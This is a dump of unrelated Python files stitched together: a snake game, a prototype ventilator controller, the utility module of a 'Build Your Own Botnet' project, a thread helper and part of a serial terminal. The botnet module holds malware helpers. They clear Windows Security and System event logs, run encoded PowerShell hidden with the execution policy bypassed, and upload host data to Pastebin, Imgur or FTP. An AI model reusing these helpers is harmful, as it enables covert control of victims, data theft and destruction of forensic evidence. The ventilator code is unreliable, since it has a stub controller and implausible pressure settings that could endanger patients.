self.snake['snake'][length - 1][1]
)
elif direction == 'Left': # left
dot = (
self.snake['snake'][length - 1][0],
self.snake['snake'][length - 1][1] - 1
)
elif direction == 'Down': # down
dot = (
self.snake['snake'][length - 1][0] + 1,
self.snake['snake'][length - 1][1]
)
elif direction == 'Right': # right
dot = (
self.snake['snake'][length - 1][0],
self.snake['snake'][length - 1][1] + 1
)
return dot
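# Example (sketch): with the initial body [(30, 20) ... (30, 23)] the head is
# (30, 23), so nextDot('Right') returns (30, 24) and nextDot('Up') returns (29, 23).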
# check whether a cell position is valid
def CheckIsValid(self, dot):
# hit a body segment other than the tail
if dot in self.snake['snake'] and \
dot != self.snake['snake'][0]:
return False
if dot[0] < 0 or dot[0] > self.row - 1 or \
dot[1] < 0 or dot[1] > self.column - 1: # hit a wall (out of bounds)
return False
else:
return True
# move one step in the given direction
def move(self, direction):
operationInfo = {
'Lose': False, # whether the game is lost
'win': False # whether the game is won
}
# ignore moves that reverse the current direction
if direction == self.opposite_Direction[self.snake['direction']]:
return operationInfo
nextDot = self.nextDot(direction)
if self.CheckIsValid(nextDot):
self.snake['direction'] = direction # update direction
self.snake['snake'].append(nextDot)
if nextDot == self.snake['snake'][0]: # catching the tail means the board is full: win
operationInfo['win'] = True
elif nextDot != self.snake['food']: # no food eaten, so pop the tail off the queue
self.snake['tail'] = self.snake['snake'].pop(0)
else:
self.score += 1
self.food() # refresh the food position
else:
operationInfo['Lose'] = True # lose
return operationInfo
# graphics module
class Graph():
# window object
panel = Tk()
panel.title("Gluttonous Snake") # title
panel.geometry("640x480") # window size
panel.resizable(width = False, height = False) # fixed window size
core = None # holds the Core object
graphMatrix = [] # board matrix of canvas rectangles
dotSize = 10 # cell width in pixels
stopThread = False # pause flag
# main canvas
cv = Canvas(
panel,
bg = 'black',
width = 640,
height = 480
)
gameWindow = None # holds the game window
gameCv = None # holds the game canvas
def __init__(self, core):
# initialization
self.core = core
self.initGraph()
self.initGraphMatrix()
# draw the snake
self.draw()
# listen for keyboard events
self.panel.bind('<KeyPress>', self.onKeyboardEvent)
# start the movement thread
self.autoRun = threading.Thread(target = self.Run, args = ())
self.autoRun.setDaemon(True)
self.autoRun.start()
# enter the message loop
self.panel.mainloop()
# interface initialization
def initGraph(self):
self.createGameWindow() # initialize the game window
self.cv.pack()
# initialize the board matrix of rectangles
def initGraphMatrix(self):
for i in range(self.core.row):
self.graphMatrix.append([])
for j in range(self.core.column):
rectangle = self.gameCv.create_rectangle(
40 + j * self.dotSize,
40 + i * self.dotSize,
40 + self.dotSize + j * self.dotSize,
40 + self.dotSize + i * self.dotSize,
outline = 'yellow',
fill = 'yellow',
state = HIDDEN
)
self.graphMatrix[i].append(rectangle)
# create the game window
def createGameWindow(self):
# game canvas
self.gameCv = Canvas(
self.panel,
bg = 'black',
width = 640,
height = 480
)
# double-outlined main frame
self.gameCv.create_rectangle(
36, 36, 44 + 20 * 20, 44 + 20 * 20,
outline = 'lightgray',
fill = 'black'
)
self.gameCv.create_rectangle(
39, 39, 41 + 20 * 20, 41 + 20 * 20,
outline = 'lightgray',
fill = 'black'
)
self.gameWindow = self.cv.create_window(
320, 240,
window = self.gameCv,
state = NORMAL
)
# scoreboard
self.gameCv.create_rectangle(
500, 40, 600, 90,
outline = 'white',
fill = 'black'
)
self.gameCv.create_text(
525, 50,
text = 'Score:',
fill = 'white'
)
self.scoreText = self.gameCv.create_text(
575, 50,
text = self.core.score,
fill = 'white'
)
# draw the snake onto the board matrix
def draw(self):
length = len(self.core.snake['snake'])
head = self.core.snake['snake'][length - 1]
tail = self.core.snake['tail']
# show the new head cell
self.gameCv.itemconfig(
self.graphMatrix[head[0]][head[1]],
state = NORMAL
)
# erase the tail cell
self.gameCv.itemconfig(
self.graphMatrix[tail[0]][tail[1]],
state = HIDDEN
)
# show the food
food = self.core.snake['food']
self.gameCv.itemconfig(
self.graphMatrix[food[0]][food[1]],
state = NORMAL
)
# update the score display
self.showScore()
# show the score
def showScore(self):
self.gameCv.itemconfig(
self.scoreText,
text = self.core.score,
fill = 'white'
)
# keyboard event handler
def onKeyboardEvent(self, event):
# direction control
if event.keysym == 'Up' or \
event.keysym == 'Down' or \
event.keysym == 'Left' or \
event.keysym == 'Right':
operationInfo = self.core.move(event.keysym)
if operationInfo['win'] == True:
messagebox.showinfo('Message', 'You win!!!')
os._exit(0)
if operationInfo['Lose'] != True:
self.draw()
else:
messagebox.showinfo('Message', 'Game over!')
os._exit(0)
# pause toggle
elif event.keysym == 'p' or \
event.keysym == 'P':
if self.stopThread == False:
self.stopThread = True
else:
self.stopThread = False
# auto-run loop
def Run(self):
while True:
if self.stopThread == False:
operationInfo = self.core.move(self.core.snake['direction'])
if operationInfo['win'] == True:
messagebox.showinfo('Message', 'You win!!!')
os._exit(0)
if operationInfo['Lose'] != True:
self.draw()
else:
messagebox.showinfo('Message', 'Game over!')
os._exit(0)
time.sleep(self.core.interval)
else:
time.sleep(0.001)
Graph(Core()) |
Controller.py | # Controller v1.1
# 2020-05-09 12.05 AM (Melb)
import math
import time
from datetime import datetime
import threading
import RPi.GPIO as GPIO
from SensorReader import SensorReader
import logging.config
# Parameters
Ti = 5 # inspiratory time
Te = 5 # expiratory time
Tw = 1 # waiting time
Vt = 5 # tidal volume
Pi = 2000 # peak inspiratory pressure in cmH2O
Peep = 900 # PEEP
PWM_FREQ = 4 # frequency for PWM
# Constants
SI_PIN = 12 # PIN (PWM) for inspiratory solenoid
SE_PIN = 13 # PIN (PWM) for expiratory solenoid
DUTY_RATIO_100 = 100
DUTY_RATIO_0 = 0
NUMBER_OF_SENSORS = 4
BUS_1 = 1
BUS_2 = 3
BUS_3 = 4
BUS_4 = 5
pressure_data = [0] * 6
# Initialize digital output pins
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(SI_PIN, GPIO.OUT)
GPIO.setup(SE_PIN, GPIO.OUT)
pwm_i = GPIO.PWM(SI_PIN, PWM_FREQ)
pwm_e = GPIO.PWM(SE_PIN, PWM_FREQ)
# declare logger parameters
logging.config.fileConfig(fname='logger.conf', disable_existing_loggers=False)
logger = logging.getLogger(__name__)
def thread_slice(pressure_data, index):
sr = SensorReader(index)
pressure = sr.read_pressure()
pressure_data[index] = pressure
def read_data():
# read four pressure sensors from the smbus and return actual values
threads = list()
for index in [BUS_1, BUS_2, BUS_3, BUS_4]:
thread = threading.Thread(target=thread_slice, args=(pressure_data, index,))
threads.append(thread)
thread.start()
for index, thread in enumerate(threads):
thread.join()
logger.debug("Pressure: P1[%.2f], P2[%.2f], P3[%.2f], P4[%.2f]" %
(pressure_data[BUS_1], pressure_data[BUS_2], pressure_data[BUS_3], pressure_data[BUS_4]))
return pressure_data[BUS_1], pressure_data[BUS_2], pressure_data[BUS_3], pressure_data[BUS_4]
def calculate_k(p1, p2, flow_rate):
return flow_rate / math.sqrt(abs(p1 - p2))
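# Worked example: during calibration at a known flow of 12 L/min, a measured
# pressure drop of 9 (sensor units) gives k = 12 / sqrt(9) = 4.0; the same k
# later recovers flow as q = k * sqrt(|p1 - p2|).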
# With current settings flow meter will be calibrated over 5 seconds (nSamples * delay)
def calibrate_flow_meter(flow_rate):
""" returns the calibrated k for both insp and exp flow meters, calculated based on multiple pressure readings """
# Turn ON both the solenoids fully for calibration
pwm_i.start(100)
pwm_e.start(100)
nSamples = 10 # average over 10 samples
delay = 0.5 # 0.5 seconds
n = 0
ki = 0
ke = 0
# Take the average over 'nSamples' pressure readings, 'delay' seconds apart to calculate k
while n < nSamples:
p1, p2, p3, p4 = read_data()
ki += calculate_k(p1, p2, flow_rate)
ke += calculate_k(p3, p4, flow_rate)
n += 1
time.sleep(delay)
ki /= nSamples
ke /= nSamples
logger.debug("Flow meter was calibrated. k_ins = %.4f, k_exp = %.4f" % (ki, ke))
return ki, ke
def control_solenoid(pin, duty_ratio):
if pin == SI_PIN:
pwm_i.ChangeDutyCycle(duty_ratio)
elif pin == SE_PIN:
pwm_e.ChangeDutyCycle(duty_ratio)
logger.debug("Changed duty cycle to " + str(duty_ratio) + "on pin " + str(pin))
# def control_solenoid(pin, duty_ratio):
# # read four pressure sensors from the smbus and return actual values
# logger.info("Entering control_solenoid()...")
# on_time = PWM_PERIOD * duty_ratio
# off_time = PWM_PERIOD * (1 - duty_ratio)
#
# if pin in threads_map:
# threads_map[pin].stop()
# threads_map[pin].join()
#
# t = PWMController(datetime.now().strftime('%Y%m%d%H%M%S%f'), pin, on_time, off_time)
# threads_map[pin] = t
#
# # Don't want these threads to run when the main program is terminated
# t.daemon = True
# t.start()
#
# logger.info("Leaving control_solenoid().")
def get_average_volume_rate(is_insp_phase):
""" read p1 and p2 over 200 milliseconds and return average volume rate """
nSamples = 4 # average over 4 samples
delay = 0.05 # 50 milliseconds
n = 0
q = 0
# Take the average over 'nSamples' pressure readings, 'delay' seconds apart to calculate flow rate
while n < nSamples:
p1, p2, p3, p4 = read_data()
if is_insp_phase:
q += Ki * math.sqrt(abs(p1 - p2))
else:
q += Ke * math.sqrt(abs(p3 - p4))
n += 1
time.sleep(delay)
return q / nSamples
def calculate_pid_duty_ratio(demo_level):
""" TODO: implement the PID controller to determine the required duty ratio to achieve the desired pressure curve
Currently a temporary hack is implemented with demo_level """
duty_ratio = 100
if demo_level == 1:
duty_ratio = 20
return duty_ratio
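# Minimal sketch of the intended PID form (illustrative only; the gains and
# pressure setpoint below are hypothetical and not part of this controller):
# error = target_pressure - measured_pressure
# integral += error * dt
# derivative = (error - prev_error) / dt
# duty_ratio = min(max(kp * error + ki * integral + kd * derivative, 0), 100)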
def insp_phase(demo_level):
""" inspiratory phase tasks
demo_level is a temporary hack to introduce two flow rate levels until pid controller is implemented """
logger.info("Entering inspiratory phase...")
start_time = datetime.now()
t1, t2 = start_time, start_time
ti = 0
q1, q2 = 0, 0
vi = 0
# Control solenoids
control_solenoid(SE_PIN, DUTY_RATIO_0)
while ti < Ti and vi < Vt:
t1 = t2
q1 = q2
q2 = get_average_volume_rate(True)
t2 = datetime.now()
vi += (q1 + q2) / 2 * (t2 - t1).total_seconds() / 60
di = calculate_pid_duty_ratio(demo_level)
control_solenoid(SI_PIN, di)
ti = (datetime.now() - start_time).total_seconds()
logger.info("Flow rate: %.2f L/min, Volume: %.2f L, Time: %.1f sec" % (q2, vi, ti))
logger.info("Leaving inspiratory phase.")
def exp_phase():
""" expiratory phase tasks """
logger.info("Entering expiratory phase...")
start_time = datetime.now()
t1, t2 = start_time, start_time
ti = 0
q1, q2 = 0, 0
vi = 0
p3 = Peep
control_solenoid(SI_PIN, DUTY_RATIO_0)
control_solenoid(SE_PIN, DUTY_RATIO_100)
while ti < Te and p3 >= Peep:
t1 = t2
q1 = q2
q2 = get_average_volume_rate(False)
t2 = datetime.now()
vi += (q1 + q2) / 2 * (t2 - t1).total_seconds() / 60
p1, p2, p3, p4 = read_data()
if p3 < Peep:
control_solenoid(SE_PIN, 0)
ti = (datetime.now() - start_time).total_seconds()
logger.info("Flow rate: %.2f L/min, Volume: %.2f L, Pressure_insp: %.2f cmH20, Time: %.1f sec"
% (q2, vi, convert_pressure(p3), ti))
logger.info("Leaving expiratory phase.")
logger.info("Actual tidal volume delivered : %.3f L " % vi)
def wait_phase():
""" waiting phase tasks """
logger.info("Entering wait phase...")
control_solenoid(SI_PIN, DUTY_RATIO_0)
control_solenoid(SE_PIN, DUTY_RATIO_0)
time.sleep(Tw)
logger.info("Leaving wait phase.")
def convert_pressure(p_hpa):
""" returns inspiratory pressure in cmH2O"""
return p_hpa * 1.0197442
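# Example: a reading of 981 hPa converts to 981 * 1.0197442 ~= 1000.4 cmH2O.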
#######################################################################################################
# 12 here is the intended flow_rate for calibration in L/min
Ki, Ke = calibrate_flow_meter(12)
while True:
# slow flow rate
# logger.info("***** Slower flow rate cycle *****")
# insp_phase(1)
# exp_phase()
# wait_phase()
# logger.info("***** Slower cycle end *****")
# faster flow rate
logger.info("***** Faster flow rate cycle *****")
insp_phase(2)
exp_phase()
wait_phase()
logger.info("***** Faster cycle end *****")
|
util.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
'Utilities (Build Your Own Botnet)'
from __future__ import print_function
import colorama
colorama.init()
_debug = False
# main
def log(info, level='debug'):
"""
Log output to the console (if verbose output is enabled)
"""
import logging
logging.basicConfig(level=logging.DEBUG if globals()['_debug'] else logging.ERROR) # a StreamHandler to stderr is the default
logger = logging.getLogger(__name__)
getattr(logger, level if hasattr(logger, level) else 'debug')(str(info))
def imports(source, target=None):
"""
Attempt to import each package into the module specified
`Required`
:param list source: package/module to import
`Optional`
:param object target: target object/module to import into
"""
if isinstance(source, str):
source = source.split()
if isinstance(target, dict):
module = target
elif hasattr(target, '__dict__'):
module = target.__dict__
else:
module = globals()
for src in source:
try:
exec("import {}".format(src), target)
except ImportError:
log("missing package '{}' is required".format(source))
def is_compatible(platforms=['win32','linux2','darwin'], module=None):
"""
Verify that a module is compatible with the host platform
`Optional`
:param list platforms: compatible platforms
:param str module: name of the module
"""
import sys
if sys.platform in platforms:
return True
log("module {} is not yet compatible with {} platforms".format(module if module else '', sys.platform), level='warn')
return False
def platform():
"""
Return the system platform of host machine
"""
import sys
return sys.platform
def public_ip():
"""
Return public IP address of host machine
"""
import sys
if sys.version_info[0] > 2:
from urllib.request import urlopen
else:
from urllib import urlopen
return urlopen('http://api.ipify.org').read().decode('utf-8')
def local_ip():
"""
Return local IP address of host machine
"""
import socket
return socket.gethostbyname(socket.gethostname())
def mac_address():
"""
Return MAC address of host machine
"""
import uuid
return ':'.join('{:012x}'.format(uuid.getnode())[i:i+2] for i in range(0, 12, 2)).upper()
def architecture():
"""
Check if host machine has 32-bit or 64-bit processor architecture
"""
import struct
return int(struct.calcsize('P') * 8)
def device():
"""
Return the name of the host machine
"""
import socket
return socket.getfqdn(socket.gethostname())
def username():
"""
Return username of current logged in user
"""
import os
return os.getenv('USER', os.getenv('USERNAME', 'user'))
def administrator():
"""
Return True if current user is administrator, otherwise False
"""
import os
import ctypes
return bool(ctypes.windll.shell32.IsUserAnAdmin() if os.name == 'nt' else os.getuid() == 0)
def geolocation():
"""
Return latitute/longitude of host machine (tuple)
"""
import sys
import json
if sys.version_info[0] > 2:
from urllib.request import urlopen
else:
from urllib2 import urlopen
response = urlopen('http://ipinfo.io').read()
json_data = json.loads(response)
latitude, longitude = json_data.get('loc').split(',')
return (latitude, longitude)
def ipv4(address):
"""
Check if valid IPv4 address
`Required`
:param str address: string to check
Returns True if input is valid IPv4 address, otherwise False
"""
import socket
try:
if socket.inet_aton(str(address)):
return True
except:
return False
def status(timestamp):
"""
Check the status of a job/thread
`Required`
:param float timestamp: Unix timestamp (seconds since the Epoch)
"""
import time
c = time.time() - float(timestamp)
data=['{} days'.format(int(c / 86400.0)) if int(c / 86400.0) else str(),
'{} hours'.format(int((c % 86400.0) / 3600.0)) if int((c % 86400.0) / 3600.0) else str(),
'{} minutes'.format(int((c % 3600.0) / 60.0)) if int((c % 3600.0) / 60.0) else str(),
'{} seconds'.format(int(c % 60.0)) if int(c % 60.0) else str()]
return ', '.join([i for i in data if i])
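# Example (sketch): for a job started 3725 seconds ago,
# >>> status(time.time() - 3725)
# '1 hours, 2 minutes, 5 seconds'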
def unzip(filename):
"""
Extract all files from a ZIP archive
`Required`
:param str filename: path to ZIP archive
"""
import os
import zipfile
z = zipfile.ZipFile(filename)
path = os.path.dirname(filename)
z.extractall(path=path)
def post(url, headers={}, data={}, json={}, as_json=False):
"""
Make a HTTP post request and return response
`Required`
:param str url: URL of target web page
`Optional`
:param dict headers: HTTP request headers
:param dict data: HTTP request POST data
:param dict json: POST data in JSON format
:param bool as_json: return JSON formatted output
"""
try:
import requests
req = requests.post(url, headers=headers, data=data, json=json)
output = req.content
if as_json:
try:
output = req.json()
except: pass
return output
except ImportError:
import sys
if sys.version_info[0] > 2:
from urllib.request import urlopen,Request
from urllib.parse import urlencode # urlencode lives in urllib.parse on Python 3
else:
from urllib import urlencode
from urllib2 import urlopen,Request
data = urlencode(data).encode('utf-8') # Request needs bytes on Python 3
req = Request(str(url), data=data)
for key, value in headers.items():
req.headers[key] = value
output = urlopen(req).read()
if as_json:
import json
try:
output = json.loads(output)
except: pass
return output
def normalize(source):
"""
Normalize data/text/stream
`Required`
:param source: string OR readable-file
"""
import os
if os.path.isfile(source):
return open(source, 'rb').read()
elif hasattr(source, 'getvalue'):
return source.getvalue()
elif hasattr(source, 'read'):
if hasattr(source, 'seek'):
source.seek(0)
return source.read()
else:
return bytes(source)
def registry_key(key, subkey, value):
"""
Create a new Windows Registry Key in HKEY_CURRENT_USER
`Required`
:param str key: primary registry key name
:param str subkey: registry key sub-key name
:param str value: registry key sub-key value
Returns True if successful, otherwise False
"""
try:
import _winreg
reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, key, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(reg_key, subkey, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(reg_key)
return True
except Exception as e:
log(e)
return False
def png(image):
"""
Transforms raw image data into a valid PNG data
`Required`
:param image: `numpy.darray` object OR `PIL.Image` object
Returns raw image data in PNG format
"""
import sys
import zlib
import numpy
import struct
from io import BytesIO # PNG data is binary; BytesIO works on both Python 2 and 3
if isinstance(image, numpy.ndarray):
width, height = (image.shape[1], image.shape[0])
data = image.tobytes()
elif hasattr(image, 'width') and hasattr(image, 'height') and hasattr(image, 'rgb'):
width, height = (image.width, image.height)
data = image.rgb
else:
raise TypeError("invalid input type: {}".format(type(image)))
line = width * 3
png_filter = struct.pack('>B', 0)
scanlines = b"".join([png_filter + data[y * line:y * line + line] for y in range(height)])
magic = struct.pack('>8B', 137, 80, 78, 71, 13, 10, 26, 10)
ihdr = [b"", b'IHDR', b"", b""]
ihdr[2] = struct.pack('>2I5B', width, height, 8, 2, 0, 0, 0)
ihdr[3] = struct.pack('>I', zlib.crc32(b"".join(ihdr[1:3])) & 0xffffffff)
ihdr[0] = struct.pack('>I', len(ihdr[2]))
idat = [b"", b'IDAT', zlib.compress(scanlines), b""]
idat[3] = struct.pack('>I', zlib.crc32(b"".join(idat[1:3])) & 0xffffffff)
idat[0] = struct.pack('>I', len(idat[2]))
iend = [b"", b'IEND', b"", b""]
iend[3] = struct.pack('>I', zlib.crc32(iend[1]) & 0xffffffff)
iend[0] = struct.pack('>I', len(iend[2]))
fileh = BytesIO()
fileh.write(magic)
fileh.write(b"".join(ihdr))
fileh.write(b"".join(idat))
fileh.write(b"".join(iend))
return fileh.getvalue()
def delete(target):
"""
Tries to delete file via multiple methods, if necessary
`Required`
:param str target: target filename to delete
"""
import os
import shutil
try:
_ = os.popen('attrib -h -r -s {}'.format(target)) if os.name == 'nt' else os.chmod(target, 0o777)
except OSError: pass
try:
if os.path.isfile(target):
os.remove(target)
elif os.path.isdir(target):
shutil.rmtree(target, ignore_errors=True)
except OSError: pass
def clear_system_logs():
"""
Clear Windows system logs (Application, security, Setup, System)
"""
try:
for log in ["application","security","setup","system"]:
output = powershell("& { [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog(\"%s\")}" % log)
if output:
log(output)
except Exception as e:
log(e)
def kwargs(data):
"""
Takes a string as input and returns a dictionary of keyword arguments
`Required`
:param str data: string to parse for keyword arguments
Returns dictionary of keyword arguments as key-value pairs
"""
try:
return {i.partition('=')[0]: i.partition('=')[2] for i in str(data).split() if '=' in i}
except Exception as e:
log(e)
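# Example (sketch):
# >>> kwargs("host=1.2.3.4 port=8080 verbose")
# {'host': '1.2.3.4', 'port': '8080'}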
def powershell(code):
"""
Execute code in Powershell.exe and return any results
`Required`
:param str code: script block of Powershell code
Returns any output from Powershell executing the code
"""
import os
import base64
try:
powershell = r'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe' if os.path.exists(r'C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe') else os.popen('where powershell').read().rstrip()
return os.popen('{} -exec bypass -window hidden -noni -nop -encoded {}'.format(powershell, base64.b64encode(code.encode('utf-16-le')).decode())).read() # -encoded expects base64 of UTF-16LE
except Exception as e:
log("{} error: {}".format(powershell.__name__, str(e)))
def display(output, color=None, style=None, end='\n', event=None, lock=None):
"""
Display output in the console
`Required`
:param str output: text to display
`Optional`
:param str color: red, green, cyan, magenta, blue, white
:param str style: normal, bright, dim
:param str end: __future__.print_function keyword arg
:param lock: threading.Lock object
:param event: threading.Event object
"""
if isinstance(output, bytes):
output = output.decode('utf-8')
else:
output = str(output)
_color = ''
if color:
_color = getattr(colorama.Fore, color.upper())
_style = ''
if style:
_style = getattr(colorama.Style, style.upper())
exec("""print(_color + _style + output + colorama.Style.RESET_ALL, end="{}")""".format(end))
def color():
"""
Returns a random color for use in console display
"""
try:
import random
return random.choice(['BLACK', 'BLUE', 'CYAN', 'GREEN', 'LIGHTBLACK_EX', 'LIGHTBLUE_EX', 'LIGHTCYAN_EX', 'LIGHTGREEN_EX', 'LIGHTMAGENTA_EX', 'LIGHTRED_EX', 'LIGHTWHITE_EX', 'LIGHTYELLOW_EX', 'MAGENTA', 'RED', 'RESET', 'WHITE', 'YELLOW'])
except Exception as e:
log("{} error: {}".format(color.__name__, str(e)))
def imgur(source, api_key=None):
"""
Upload image file/data to Imgur
"""
import base64
if api_key:
response = post('https://api.imgur.com/3/upload', headers={'Authorization': 'Client-ID {}'.format(api_key)}, data={'image': base64.b64encode(normalize(source)), 'type': 'base64'}, as_json=True)
return response['data']['link'].encode()
else:
log("No Imgur API key found")
def pastebin(source, api_key):
"""
Upload file/data to Pastebin
`Required`
:param str source: data or readable file-like object
:param str api_dev_key: Pastebin api_dev_key
`Optional`
:param str api_user_key: Pastebin api_user_key
"""
import sys
if sys.version_info[0] > 2:
from urllib.parse import urlsplit,urlunsplit
else:
from urllib2 import urlparse
urlsplit = urlparse.urlsplit
urlunsplit = urlparse.urlunsplit
if isinstance(api_key, str):
try:
info = {'api_option': 'paste', 'api_paste_code': normalize(source), 'api_dev_key': api_key}
paste = post('https://pastebin.com/api/api_post.php', data=info)
parts = urlsplit(paste)
result = urlunsplit((parts.scheme, parts.netloc, '/raw' + parts.path, parts.query, parts.fragment)) if paste.startswith('http') else paste
if not result.endswith('/'):
result += '/'
return result
except Exception as e:
log("Upload to Pastebin failed with error: {}".format(e))
else:
log("No Pastebin API key found")
def ftp(source, host=None, user=None, password=None, filetype=None):
"""
Upload file/data to FTP server
`Required`
:param str source: data or readable file-like object
:param str host: FTP server hostname
:param str user: FTP account username
:param str password: FTP account password
`Optional`
:param str filetype: target file type (default: .txt)
"""
import os
import time
import ftplib
try:
from StringIO import StringIO # Python 2
except ImportError:
from io import StringIO # Python 3
if host and user and password:
path = ''
local = time.ctime().split()
if os.path.isfile(str(source)):
path = source
source = open(path, 'rb')
elif hasattr(source, 'seek'):
source.seek(0)
else:
source = StringIO(source)
try:
ftp = ftplib.FTP(host=host, user=user, password=password)
except:
return "Upload failed - remote FTP server authorization error"
addr = public_ip()
if 'tmp' not in ftp.nlst():
ftp.mkd('/tmp')
if addr not in ftp.nlst('/tmp'):
ftp.mkd('/tmp/{}'.format(addr))
if path:
path = '/tmp/{}/{}'.format(addr, os.path.basename(path))
else:
filetype = '.' + str(filetype) if not str(filetype).startswith('.') else str(filetype)
path = '/tmp/{}/{}'.format(addr, '{}-{}_{}{}'.format(local[1], local[2], local[3], filetype))
stor = ftp.storbinary('STOR ' + path, source)
return path
else:
log('missing one or more required arguments: host, user, password')
def config(*arg, **options):
"""
Configuration decorator for adding attributes (e.g. declare platforms attribute with list of compatible platforms)
"""
import functools
def _config(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
return function(*args, **kwargs)
for k,v in options.items():
setattr(wrapper, k, v)
return wrapper
return _config
def threaded(function):
"""
Decorator for making a function threaded
`Required`
:param function: function/method to run in a thread
"""
import time
import threading
import functools
@functools.wraps(function)
def _threaded(*args, **kwargs):
t = threading.Thread(target=function, args=args, kwargs=kwargs, name=time.time())
t.daemon = True
t.start()
return t
return _threaded
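# Usage sketch (hypothetical worker function):
# @threaded
# def beacon(host): ...
# t = beacon("example.com")  # returns the daemonized Thread immediately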
|
process.py | """
Raspbot Remote Control Application (Raspbot RCA, Raspbot RCA-G), v1.2
basics module, contains basic application functions such as exiting client software, multithreading, and editing configs.
Made by perpetualCreations
Handles multithreading.
"""
from basics import objects
from typing import Union
def create_process(target: Union[classmethod, staticmethod, object], args: tuple = ()) -> Union[None, object]:
"""
Creates a new thread from multithreading.
@param target: the function being processed.
@param args: the arguments for said function being processed.
@return: if failed, returns nothing. otherwise returns dummy variable.
"""
if __name__ == "basics.process":
try:
dummy = objects.threading.Thread(target = target, args = args, daemon = True)
dummy.start()
except objects.threading.ThreadError as ThreadErrorMessage:
print("[FAIL]: Process creation failed! Details below.")
print(ThreadErrorMessage)
return None
return dummy
else: return None
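# Usage sketch (hypothetical worker function):
# def worker(msg): print(msg)
# handle = create_process(worker, ("hello",))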
def stop_process(target: object) -> bool:
"""
Returns True for termination flag for a thread, joins given target.
Use as thread_flag = stop_process(thread_object).
@param target: process to be stopped.
@return: bool, True
"""
target.join()
return True
|
miniterm.py | #!/usr/bin/python
# Very simple serial terminal
# (C)2002-2009 Chris Liechti <cliechti@gmx.net>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped through Python's
# repr, useful for debug purposes)
import sys, os, serial, threading
EXITCHARCTER = '\x1d' # GS/CTRL+]
MENUCHARACTER = '\x14' # Menu: CTRL+T
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys are used and not the values at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-8s Send the menu character itself to remote
--- %(exchar)-8s Send the exit character to remote
--- %(info)-8s Show info
--- %(upload)-8s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)s RTS %(echo)s local echo
--- %(dtr)s DTR %(break)s BREAK
--- %(lfm)s line feed %(repr)s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console:
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while 1:
z = msvcrt.getch()
if z == '\0' or z == '\xe0': # function keys
msvcrt.getch()
else:
if z == '\r':
return '\n'
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console:
def __init__(self):
self.fd = sys.stdin.fileno()
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
console.setup()
sys.exitfunc = cleanup_console #terminal modes have to be restored on exit...
else:
raise "Sorry no implementation for your platform (%s) available." % sys.platform
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERSION_MAP = ('\n', '\r', '\r\n')
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm:
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERSION_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def start(self):
self.alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(1)
self.receiver_thread.start()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(1)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits,
))
sys.stderr.write('--- RTS %s\n' % (self.rts_state and 'active' or 'inactive'))
sys.stderr.write('--- DTR %s\n' % (self.dtr_state and 'active' or 'inactive'))
sys.stderr.write('--- BREAK %s\n' % (self.break_state and 'active' or 'inactive'))
